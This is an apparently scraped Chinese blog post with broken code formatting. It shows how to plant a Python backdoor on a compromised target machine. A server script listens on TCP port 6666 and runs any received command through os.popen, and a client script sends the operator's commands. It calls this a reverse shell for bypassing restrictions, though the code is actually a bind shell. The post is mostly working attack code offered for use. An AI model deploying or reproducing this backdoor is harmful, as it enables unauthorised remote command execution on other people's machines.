利用python模拟菜刀反弹shell绕过限制

系统 383 0

有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell

主要用到python os库和sokect库

这里的服务端在目标机上运行

            
              from
            
             socket 
            
              import
            
             *

            
              from
            
             os 
            
              import
            
             *
            
              
s
            
            =socket(AF_INET,SOCK_STREAM)
            
              #
            
            
              IVP4 寻址  tcp协议
            
            
s.bind((
            
              ''
            
            ,6666))
            
              #
            
            
              补丁端口
            
            
s.listen(1)
            
              #
            
            
              开始监听一个队列
            
            
              while
            
            
               True:
    sock,addr
            
            =s.accept()
            
              #
            
            
              返回两次 第一次返回连接地址 二 端口号
            
            
              print
            
             (
            
              '
            
            
              客户端:
            
            
              '
            
            
              ,addr)
    
            
            
              while
            
            
               True:
        cmd
            
            =sock.recv(1024)
            
              #
            
            
              缓存长度 接收传递过来
            
            
        cmdstr=
            
              cmd.decode()
        
            
            
              if
            
             cmdstr==
            
              '
            
            
              exit
            
            
              '
            
            
              :
            
            
            
              print
            
             (
            
              '
            
            
              客户端:
            
            
              '
            
            ,addr,
            
              '
            
            
              关闭
            
            
              '
            
            
              )
            sock.close()
            
            
            
              break
            
            
              
        result
            
            =
            
              popen(cmdstr).read()
        sock.send(result.encode())
s.close()
            
          

本机运行

            
              from
            
             socket 
            
              import
            
             *

            
              from
            
             os 
            
              import
            
             *
            
              

c
            
            =socket(AF_INET,SOCK_STREAM)
            
              #
            
            
              IVP4 寻址  tcp协议
            
            
c.connect((
            
              '
            
            
              127.0.0.1
            
            
              '
            
            ,6666))
            
              #
            
            
              连接地址
            
            
              while
            
            
               True:
    cmd
            
            =input(
            
              "
            
            
              cmd:
            
            
              "
            
            
              )
    c.send(cmd.encode())
            
            
              #
            
            
              必须传递流
            
            
              if
            
             cmd==
            
              '
            
            
              exit
            
            
              '
            
            
              :
        c.close()
        
            
            
              break
            
            
              
    data
            
            =c.recv(1014
            
              )
    
            
            
              print
            
             (data.decode())
          

 


更多文章、技术交流、商务合作、联系博主

微信扫码或搜索:z360901061

微信扫一扫加我为好友

QQ号联系: 360901061

您的支持是博主写作最大的动力,如果您喜欢我的文章,感觉我的文章对您有帮助,请请扫描上面二维码支持博主1元、2元、5元等您想捐的金额吧,狠狠点击下面给点支持吧

发表我的评论
最新评论 总共0条评论